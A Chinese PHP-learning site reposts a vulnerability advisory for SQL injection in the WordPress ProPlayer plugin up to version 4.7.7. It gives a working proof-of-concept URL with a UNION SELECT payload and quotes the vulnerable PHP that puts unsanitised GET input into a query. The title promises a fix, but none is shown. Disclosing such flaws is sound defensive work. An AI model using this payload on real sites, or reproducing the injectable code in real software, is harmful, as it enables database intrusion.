网站地图    收藏   

主页 > 后端 > 网站安全 >

ProPlayer plugin <= 4.7.7 SQL注射缺陷及修复 - 网站安

来源:自学PHP网    时间:2015-04-17 14:46 作者: 阅读:

[导读] # Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)# Software Link: http://downloads.wordpress.org/plugin/proplayer.4.7.7.zip# Version: 4.7.7 (tested)---PoC---http://ww......

# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# Software Link: http://downloads.wordpress.org/plugin/proplayer.4.7.7.zip
# Version: 4.7.7 (tested)
 
---
PoC
---
http://www.2cto.com /wp-content/plugins/proplayer/playlist-controller.php?pp_playlist_id=-1') UNION ALL SELECT NULL,NULL,@@version--%20
 
---------------
Vulnerable code
---------------
function getPlaylist($id = '') {
    $query = mysql_query("SELECT * FROM ".$this->tablePrefix."proplayer_playlist WHERE (POST_ID='$id')");
    $playlistRow = mysql_fetch_row($query);
    
    return $this->withBackwardCompatibility($playlistRow[2]);
}
 
...
 
if (!empty($_GET["pp_playlist_id"])) {
    header("Content-type: application/xml");
    $xml = $playlistController->getPlaylist($_GET["pp_playlist_id"]);
 

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

添加评论